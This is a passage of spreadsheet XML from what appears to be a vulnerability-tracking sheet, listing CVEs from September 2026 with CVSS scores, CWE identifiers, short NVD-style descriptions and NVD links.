      <c r="T122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102245</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102248</t>
        </is>
      </c>
      <c r="D123" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E123" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="inlineStr"/>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K123" s="5" t="inlineStr"/>
      <c r="L123" s="5" t="inlineStr"/>
      <c r="M123" s="5" t="inlineStr"/>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P123" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q123" s="5" t="inlineStr"/>
      <c r="R123" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S123" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Rebuild up to 4.4.7/4.5.0-beta5. This affects an unknown part of the file /user/login of the component Login Endpoint. The manipulation leads to improper authentication. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102248</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102249</t>
        </is>
      </c>
      <c r="D124" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E124" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="inlineStr"/>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr"/>
      <c r="K124" s="5" t="inlineStr"/>
      <c r="L124" s="5" t="inlineStr"/>
      <c r="M124" s="5" t="inlineStr"/>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P124" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q124" s="5" t="inlineStr"/>
      <c r="R124" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-863</t>
        </is>
      </c>
      <c r="S124" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in REBUILD up to 4.4.11. This vulnerability affects unknown code of the file /commons/file-editor-save. The manipulation of the argument url/fileKey results in missing authorization. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102249</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12267</t>
        </is>
      </c>
      <c r="D125" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E125" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F125" s="5" t="inlineStr">
        <is>
          <t>0fc0942c-577d-436f-ae8e-945763c79b02</t>
        </is>
      </c>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="inlineStr"/>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K125" s="5" t="inlineStr"/>
      <c r="L125" s="5" t="inlineStr"/>
      <c r="M125" s="5" t="inlineStr"/>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P125" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q125" s="5" t="inlineStr"/>
      <c r="R125" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S125" s="5" t="inlineStr">
        <is>
          <t>ManageEngine DDI Central versions below 6201 are vulnerable to Command injection in Windows DNS Query Resolution Policy name field leading to remote code execution.</t>
        </is>
      </c>
      <c r="T125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12267</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86330</t>
        </is>
      </c>
      <c r="D126" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E126" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="inlineStr"/>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K126" s="5" t="inlineStr"/>
      <c r="L126" s="5" t="inlineStr"/>
      <c r="M126" s="5" t="inlineStr"/>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P126" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q126" s="5" t="inlineStr"/>
      <c r="R126" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S126" s="5" t="inlineStr">
        <is>
          <t>An OS command injection flaw was found in the set_hostname_internal function of NooBaa's cluster_internal_api. This component is responsible for managing the Multi-Cloud Object Gateway in OpenShift Data Foundation. The vulnerability occurs because the hostname parameter is passed directly to a shell command without proper sanitization. An authenticated attacker with administrative privileges can provide a specially crafted hostname containing shell metacharacters to execute arbitrary commands on the host system with the privileges of the NooBaa process.</t>
        </is>
      </c>
      <c r="T126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86330</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96326</t>
        </is>
      </c>
      <c r="D127" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E127" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="inlineStr"/>
      <c r="I127" s="5" t="inlineStr"/>
      <c r="J127" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K127" s="5" t="inlineStr"/>
      <c r="L127" s="5" t="inlineStr"/>
      <c r="M127" s="5" t="inlineStr"/>
      <c r="N127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O127" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P127" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q127" s="5" t="inlineStr"/>
      <c r="R127" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S127" s="5" t="inlineStr">
        <is>
          <t>The HT Contact Form – Drag &amp; Drop Form Builder for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Rich Text Editor Field in all versions up to, and including, 2.10.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="T127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96326</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101091</t>
        </is>
      </c>
      <c r="D128" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E128" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="inlineStr"/>
      <c r="I128" s="5" t="inlineStr"/>
      <c r="J128" s="5" t="inlineStr"/>
      <c r="K128" s="5" t="inlineStr"/>
      <c r="L128" s="5" t="inlineStr"/>
      <c r="M128" s="5" t="inlineStr"/>
      <c r="N128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O128" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P128" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q128" s="5" t="inlineStr"/>
      <c r="R128" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S128" s="5" t="inlineStr">
        <is>
          <t>SiYuan versions before v3.8.4 fail to properly validate SQL statements in block query embed blocks executed against siyuan.db. Attackers can craft malicious .sy documents with non-read-only SQL statements that execute automatically during background indexing, rendering, or export operations without authentication.</t>
        </is>
      </c>
      <c r="T128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101091</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102335</t>
        </is>
      </c>
      <c r="D129" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E129" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="inlineStr"/>
      <c r="I129" s="5" t="inlineStr"/>
      <c r="J129" s="5" t="inlineStr">
        <is>
          <t>nginx, gin</t>
        </is>
      </c>
      <c r="K129" s="5" t="inlineStr"/>
      <c r="L129" s="5" t="inlineStr"/>
      <c r="M129" s="5" t="inlineStr"/>
      <c r="N129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O129" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P129" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q129" s="5" t="inlineStr"/>
      <c r="R129" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S129" s="5" t="inlineStr">
        <is>
          <t>Nginx Proxy Manager through 2.16.0 fails to restrict the advanced_config field to administrators, allowing non-admin users with manage permissions to inject arbitrary nginx directives. Attackers can inject malicious nginx configuration such as alias directives to serve arbitrary files or control routing for their assigned hosts.</t>
        </is>
      </c>
      <c r="T129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102335</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15952</t>
        </is>
      </c>
      <c r="D130" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E130" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F130" s="5" t="inlineStr">
        <is>
          <t>cybersecurity@ch.abb.com</t>
        </is>
      </c>
      <c r="G130" s="5" t="inlineStr"/>
      <c r="H130" s="5" t="inlineStr"/>
      <c r="I130" s="5" t="inlineStr"/>
      <c r="J130" s="5" t="inlineStr"/>
      <c r="K130" s="5" t="inlineStr"/>
      <c r="L130" s="5" t="inlineStr"/>
      <c r="M130" s="5" t="inlineStr"/>
      <c r="N130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O130" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P130" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q130" s="5" t="inlineStr"/>
      <c r="R130" s="5" t="inlineStr">
        <is>
          <t>CWE-732</t>
        </is>
      </c>
      <c r="S130" s="5" t="inlineStr">
        <is>
          <t>Incorrect Permission Assignment for Critical Resource vulnerability in ABB Protection and control IED manager (PCM600).
This issue affects Protection and control IED manager (PCM600): through 2.14.</t>
        </is>
      </c>
      <c r="T130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15952</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52748</t>
        </is>
      </c>
      <c r="D131" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E131" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F131" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G131" s="5" t="inlineStr"/>
      <c r="H131" s="5" t="inlineStr"/>
      <c r="I131" s="5" t="inlineStr"/>
      <c r="J131" s="5" t="inlineStr"/>
      <c r="K131" s="5" t="inlineStr"/>
      <c r="L131" s="5" t="inlineStr"/>
      <c r="M131" s="5" t="inlineStr"/>
      <c r="N131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O131" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P131" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q131" s="5" t="inlineStr"/>
      <c r="R131" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S131" s="5" t="inlineStr">
        <is>
          <t>The Kaon AR2140X router contains a vulnerability where the backup functionality is accessible without authentication. This allows an unauthenticated remote attacker to trigger a configuration backup and retrieve it in a form encrypted by a device-specific key. Triggering this function renders the router inoperable for a substantial period of time. 
This issue was identified in firmware versions up to 4.2.17. Status of newer versions remains unknown.</t>
        </is>
      </c>
      <c r="T131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52748</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55096</t>
        </is>
      </c>
      <c r="D132" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E132" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F132" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G132" s="5" t="inlineStr"/>
      <c r="H132" s="5" t="inlineStr"/>
      <c r="I132" s="5" t="inlineStr"/>
      <c r="J132" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K132" s="5" t="inlineStr"/>
      <c r="L132" s="5" t="inlineStr"/>
      <c r="M132" s="5" t="inlineStr"/>
      <c r="N132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O132" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P132" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q132" s="5" t="inlineStr"/>
      <c r="R132" s="5" t="inlineStr">
        <is>
          <t>CWE-184, CWE-918</t>
        </is>
      </c>
      <c r="S132" s="5" t="inlineStr">
        <is>
          <t>fast-mcp-t</t>
        </is>
      </c>
      <c r="T132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55096</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87114</t>
        </is>
      </c>
      <c r="D133" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E133" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="inlineStr"/>
      <c r="I133" s="5" t="inlineStr"/>
      <c r="J133" s="5" t="inlineStr">
        <is>
          <t>docker, rust</t>
        </is>
      </c>
      <c r="K133" s="5" t="inlineStr"/>
      <c r="L133" s="5" t="inlineStr"/>
      <c r="M133" s="5" t="inlineStr"/>
      <c r="N133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O133" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P133" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q133" s="5" t="inlineStr"/>
      <c r="R133" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="S133" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in kube-compare. When processing a 'container://' reference path, the tool incorrectly executes an untrusted container image's entrypoint instead of merely extracting data from a stopped container. This allows a remote attacker to achieve arbitrary code execution on the operator's workstation. If the Docker daemon requires elevated privileges, the untrusted code may execute with root-mediated daemon privileges, posing a significant security risk.</t>
        </is>
      </c>
      <c r="T133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87114</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90925</t>
        </is>
      </c>
      <c r="D134" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E134" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F134" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="inlineStr"/>
      <c r="I134" s="5" t="inlineStr"/>
      <c r="J134" s="5" t="inlineStr"/>
      <c r="K134" s="5" t="inlineStr"/>
      <c r="L134" s="5" t="inlineStr"/>
      <c r="M134" s="5" t="inlineStr"/>
      <c r="N134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O134" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P134" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q134" s="5" t="inlineStr"/>
      <c r="R134" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S134" s="5" t="inlineStr">
        <is>
          <t>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Innotim Software, Telecommunications and Consultancy Trade Ltd. Co. Logsign SIEM allows Path Traversal.
This issue affects Logsign SIEM: from 6.4.101 before 6.4.117.</t>
        </is>
      </c>
      <c r="T134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90925</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93538</t>
        </is>
      </c>
      <c r="D135" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E135" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F135" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="inlineStr"/>
      <c r="I135" s="5" t="inlineStr"/>
      <c r="J135" s="5" t="inlineStr">
        <is>
          <t>suse</t>
        </is>
      </c>
      <c r="K135" s="5" t="inlineStr"/>
      <c r="L135" s="5" t="inlineStr"/>
      <c r="M135" s="5" t="inlineStr"/>
      <c r="N135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O135" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P135" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q135" s="5" t="inlineStr"/>
      <c r="R135" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-639</t>
        </is>
      </c>
      <c r="S135" s="5" t="inlineStr">
        <is>
          <t>A cross-tenant authorization issue was discovered in SUSE Rancher Fleet. During agent-initiated cluster registration, cluster labels supplied by the registering agent, including labels in the reserved management.cattle.io/ namespace such as the cluster display name label, were applied to the resulting upstream Cluster object. Because Fleet resolves GitRepo and Bundle targets from those cluster labels, a party able to register a cluster into a Fleet workspace namespace shared with other tenants could cause its own cluster to satisfy targeting rules that administrators intended for a different cluster.
This affects SUSE Rancher Fleet 0.16 before 0.16.1, 0.15 before 0.15.6, 0.14 before 0.14.10, 0.13 before 0.13.15, 0.12 before 0.12.19 and older versions.</t>
        </is>
      </c>
      <c r="T135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93538</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94286</t>
        </is>
      </c>
      <c r="D136" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E136" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F136" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="inlineStr"/>
      <c r="I136" s="5" t="inlineStr"/>
      <c r="J136" s="5" t="inlineStr"/>
      <c r="K136" s="5" t="inlineStr"/>
      <c r="L136" s="5" t="inlineStr"/>
      <c r="M136" s="5" t="inlineStr"/>
      <c r="N136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O136" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P136" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q136" s="5" t="inlineStr"/>
      <c r="R136" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S136" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read in libXtst's RECORD reply parser in libXtst before 1.2.6 could be used by malicious X servers to crash attached X clients.</t>
        </is>
      </c>
      <c r="T136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94286</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97023</t>
        </is>
      </c>
      <c r="D137" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E137" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F137" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="inlineStr"/>
      <c r="I137" s="5" t="inlineStr"/>
      <c r="J137" s="5" t="inlineStr"/>
      <c r="K137" s="5" t="inlineStr"/>
      <c r="L137" s="5" t="inlineStr"/>
      <c r="M137" s="5" t="inlineStr"/>
      <c r="N137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O137" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P137" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q137" s="5" t="inlineStr"/>
      <c r="R137" s="5" t="inlineStr">
        <is>
          <t>CWE-61</t>
        </is>
      </c>
      <c r="S137" s="5" t="inlineStr">
        <is>
          <t>A path traversal vulnerability in Flatpak's handling of the export/bin directory during app deployment allows a malicious Flatpak app to cause deletion of attacker-chosen files outside the deployment directory when the app is installed or upgraded. In system-wide installations, the deletion is performed as root.</t>
        </is>
      </c>
      <c r="T137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97023</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97024</t>
        </is>
      </c>
      <c r="D138" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E138" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="inlineStr"/>
      <c r="I138" s="5" t="inlineStr"/>
      <c r="J138" s="5" t="inlineStr"/>
      <c r="K138" s="5" t="inlineStr"/>
      <c r="L138" s="5" t="inlineStr"/>
      <c r="M138" s="5" t="inlineStr"/>
      <c r="N138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O138" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P138" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q138" s="5" t="inlineStr"/>
      <c r="R138" s="5" t="inlineStr">
        <is>
          <t>CWE-61</t>
        </is>
      </c>
      <c r="S138" s="5" t="inlineStr">
        <is>
          <t>A path traversal vulnerability in Flatpak's handling of the files/etc directory during app deployment allows a malicious Flatpak app to cause certain host system files (such as passwd, group, machine-id, or resolv.conf) to be emptied or replaced with a symlink when the app is installed or upgraded. In system-wide installations, the write is performed as root.</t>
        </is>
      </c>
      <c r="T138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97024</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97685</t>
        </is>
      </c>
      <c r="D139" s="5" t="n">
        <v>7.1</v>
